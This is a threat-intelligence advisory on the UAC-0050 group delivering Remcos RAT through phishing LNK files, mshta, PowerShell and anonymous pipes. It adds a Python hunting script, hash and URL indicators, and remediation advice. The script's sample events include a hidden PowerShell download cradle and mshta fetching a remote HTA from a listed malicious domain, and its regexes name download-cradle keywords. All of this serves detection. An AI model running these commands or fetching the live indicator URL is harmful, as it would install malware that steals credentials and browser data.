January 4, 2024
Severity
High
Analysis Summary
A threat group tracked as UAC-0050 has been observed using phishing to deliver the Remcos RAT with new techniques for evading antivirus detection. In its latest campaign the group moves data between processes through pipes, a step up in its tradecraft.
Remcos RAT is a well-known remote access trojan that gives an operator full control of the infected host and has been widely used by threat actors for espionage. UAC-0050 has been active since 2020 and is known for targeting Polish and Ukrainian organizations with social-engineering campaigns that impersonate legitimate organizations to get users to open malicious attachments.
In February 2023 the group was linked to a phishing campaign distributing Remcos RAT. In recent months the same trojan has been spread in at least three further phishing campaigns, one of which ended in the deployment of the Meduza Stealer information stealer. The latest analysis by security researchers is based on a Windows shortcut (LNK) file discovered on December 21, 2023. The initial access vector has not been confirmed, but it is believed to be phishing emails aimed at Ukrainian military personnel, using document lures that advertise consultancy roles with the Israel Defense Forces (IDF).
The LNK file first collects information about the antivirus software installed on the host. It then runs an HTML Application named "6.hta" from a remote server through mshta.exe, the Windows-native host for HTA files. The HTA launches a PowerShell script, which in turn runs a second PowerShell script that downloads two files, "ofer.docx" and "word_update.exe", from an actor-controlled domain.
When "word_update.exe" runs, it copies itself to "fmTask_dbg.exe" and establishes persistence by placing a shortcut to the new copy in the Windows Startup folder. The binary then spawns a cmd.exe child process and exchanges data with it over unnamed (anonymous) pipes; the child decrypts and launches the latest Remcos RAT build, which collects system information, cookies and saved login data from browsers including Mozilla Firefox, Internet Explorer and Google Chrome.
Because the payload is handed between processes through pipes rather than through the file system, the malware gains a covert channel that file-based scanning in Endpoint Detection and Response (EDR) and antivirus products does not see. The technique is not new, but it represents a notable leap in the sophistication of the group's tradecraft.
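The Remcos payload itself travels over anonymous pipes, so there is no dropped file to scan at that stage, but the chain described above (LNK, mshta.exe fetching a remote HTA, PowerShell downloading a dropper, a shortcut landing in the Startup folder, cmd.exe spawned from a user-writable path) leaves a distinctive process lineage. The detection logic below is an added example written for this advisory; it is not code from Rewterz or from the original researchers. It runs over constructed Sysmon-style process-creation and file-creation events (the HTA URL is the one in the IOC list below; the PIDs, user paths and the dropper download URL are made up) and flags each stage, then rebuilds the parent chain so an analyst can see the whole sequence.

```python
"""Hunt Sysmon-style telemetry for the UAC-0050 / Remcos execution chain.

Constructed example: SAMPLE_EVENTS is hand-written for this advisory, not real
telemetry. Fields mirror Sysmon Event ID 1 (process create) and Event ID 11
(file create), trimmed to what the rules need.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple, Union


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent process


@dataclass
class FileEvent:
    pid: int
    image: str          # process that created the file
    target: str         # path of the created file


Event = Union[ProcEvent, FileEvent]

# A .lnk landing in the per-user Startup folder (the persistence step).
STARTUP_LNK = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
# mshta.exe pulling an HTA over HTTP(S) instead of opening a local file.
REMOTE_HTA = re.compile(r"https?://\S+?\.hta\b", re.I)
# Directories an unprivileged user can write to; trusted system binaries
# should not be spawning shells from here.
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Public|Downloads)\\", re.I)
# Common PowerShell download cradles.
DOWNLOAD_CRADLE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer)",
    re.I)


def _basename_is(path: str, *names: str) -> bool:
    return path.lower().rsplit("\\", 1)[-1] in names


def rule_mshta_remote_hta(ev: Event) -> bool:
    return (isinstance(ev, ProcEvent) and _basename_is(ev.image, "mshta.exe")
            and bool(REMOTE_HTA.search(ev.cmdline)))


def rule_powershell_spawned_by_mshta(ev: Event) -> bool:
    return (isinstance(ev, ProcEvent) and _basename_is(ev.parent_image, "mshta.exe")
            and _basename_is(ev.image, "powershell.exe", "pwsh.exe"))


def rule_powershell_download_cradle(ev: Event) -> bool:
    return (isinstance(ev, ProcEvent) and _basename_is(ev.image, "powershell.exe", "pwsh.exe")
            and bool(DOWNLOAD_CRADLE.search(ev.cmdline)))


def rule_startup_lnk_from_user_writable(ev: Event) -> bool:
    return (isinstance(ev, FileEvent) and bool(STARTUP_LNK.search(ev.target))
            and bool(USER_WRITABLE.search(ev.image)))


def rule_cmd_child_of_user_writable_exe(ev: Event) -> bool:
    # The stage where the dropper spawns cmd.exe and feeds it the payload over
    # anonymous pipes: nothing touches disk, so the lineage is the signal.
    return (isinstance(ev, ProcEvent) and _basename_is(ev.image, "cmd.exe")
            and bool(USER_WRITABLE.search(ev.parent_image)))


RULES: List[Callable[[Event], bool]] = [
    rule_mshta_remote_hta, rule_powershell_spawned_by_mshta,
    rule_powershell_download_cradle, rule_startup_lnk_from_user_writable,
    rule_cmd_child_of_user_writable_exe,
]


def hunt(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every event that trips a rule."""
    return [(rule.__name__, ev.pid) for ev in events for rule in RULES if rule(ev)]


def ancestry(events: List[Event], pid: int) -> List[str]:
    """Walk parent links from pid back to the root, oldest first (cycle-safe)."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events if isinstance(e, ProcEvent)}
    chain: List[str] = []
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image.rsplit("\\", 1)[-1])
        pid = by_pid[pid].ppid
    return chain[::-1]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROP = r"C:\Users\victim\AppData\Local\Temp\word_update.exe"   # made-up path
SAMPLE_EVENTS: List[Event] = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"C:\Windows\System32\userinit.exe"),
    # the LNK launches mshta.exe with the remote HTA from the IOC list
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://new-tech-savvy.com/algo.hta", r"C:\Windows\explorer.exe"),
    # the HTA runs PowerShell, which downloads the dropper (download URL is made up)
    ProcEvent(300, 200, PS, "powershell.exe -w hidden -c (New-Object Net.WebClient)"
              ".DownloadFile('http://example.invalid/word_update.exe','" + DROP + "')",
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(400, 300, DROP, "word_update.exe", PS),
    # persistence: shortcut to the renamed copy dropped into the Startup folder
    FileEvent(400, DROP, r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu"
              r"\Programs\Startup\fmTask_dbg.lnk"),
    # the dropper spawns cmd.exe and talks to it over anonymous pipes
    ProcEvent(500, 400, r"C:\Windows\System32\cmd.exe", "cmd.exe", DROP),
    # benign noise: the user opens Notepad and a console from Explorer
    ProcEvent(600, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(700, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for name, pid in hunt(SAMPLE_EVENTS):
        print(f"{name:40} pid={pid}  chain={' > '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

Each rule on its own will fire on benign activity (administrators use download cradles, installers create Startup shortcuts), so in production these belong in a correlation that requires two or more stages in one lineage, with allowlists for signed deployment tooling. Note that Sysmon's pipe events (IDs 17 and 18) cover named pipes only; the anonymous pipes used here produce no pipe event, which is why the cmd.exe rule keys on parent lineage rather than on the pipe itself.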
Impact
- Sensitive Information Theft
- Cyber Espionage
Indicators of Compromise
MD5
- 56154fedaa70a3e58b7262b7c344d30a
- 9b777d69b018701ec5ad19ae3f06553f
- 7c05cfed156f152139a6b1f0d48b5cc1
- 7f87d36c989a11edf0de9af392891d89
- f5ee6aa31c950dfe55972e50e02201d3
- 5c734bb1e41fab9c7b2dabd06e27bc7b
- 8158b43f745e0e7a519458b0150e1b61
- f71ef85824f906856cb3d2205058bdd2
- 8bebea01d914a3c3a2d876417f7d1d54
- b1f8484ee01a7730938210ea6e851888
SHA-256
- f650a9f1930e55e405d7121c56b90a996ab213a05b772a8f02ceb1cdbeb91165
- 8963e1c87200d0b900f558c1968428dc3a1f05748ddeff0150297aa33d14ff88
- e4615b74d62f384d23e58bc467c615b17779e4f8084c8a0134db97a5e642027f
- c5452b859922b9633839e092f09f0ce4818b6085043360c90c0b0f2bfad9fca1
- 5fff1cd29bb6e6cfe9516b70f9f44755098392c2e2a0f4784486182c309b2c99
- bd871a2ccd6d7c4f89f9f5087e60cfdcc7ab35b670cfda7ddfd6dbbab8c8560c
- 378c219332e74786b5ce562d15a99fe021e47f1480be09b779db78ae87da9c26
- 3b78e6564c4774a6d3cd88c62e56c6705c2428e53cacb3a95713b8c399a7d7ad
- ab310316f34881a67c6df912e646203adc676d1f53a5bf43873014dfdb0d68cf
- 88f0722c907100ef09049c82032a0ac66afa153d03fb89d378ae65f6e5890a3f
SHA-1
- 31ba4f7a41dda57b4d10ebbc020db9c17012f17c
- f2d8bce46e8df36013b89e4de8bca66e3cf0de3e
- a9bc862f7143a3e34ba420d624f81a9efd1516fc
- e644bc7774cfd1beecea50fb47b8ffd32b092c30
- 502bbd516526e579b2b0d0a5aaef0a66659e7fbb
- 1bee4d678beb8928377fbc112eade1af5ec30295
- 09f678acd0ecb99e22e069661edf4fda8457e496
- f20d2dcdd6303ed23bfe9dcffe3736a6de660a74
- 5089adac80acd2d36ad9cb1cce0e4a544474269e
- 4ab9c910cfc9690b7f54eba83e30bc1fe6984297
URL
- http://new-tech-savvy.com/algo.hta
Remediation
- Block all threat indicators at your respective controls.
- Search for Indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Never trust or open links and attachments received from unknown sources/senders.
- Passwords – Enforce general security hygiene: strong passwords, correct configurations, and sound administrative security policies.
- Admin Access – Limit access to administrative accounts and portals to the personnel who need it, and make sure they are not reachable from the internet.
- Patch and upgrade platforms and software promptly and make this a standing security policy. Prioritize known exploited vulnerabilities and zero-days.
- Enable antivirus and anti-malware software and keep signature definitions current. Layered protection is necessary to secure vulnerable assets.
- Restrict or monitor mshta.exe (for example through application control) and alert on PowerShell spawned by mshta.exe and on shortcuts written to the Windows Startup folder, since this chain depends on both.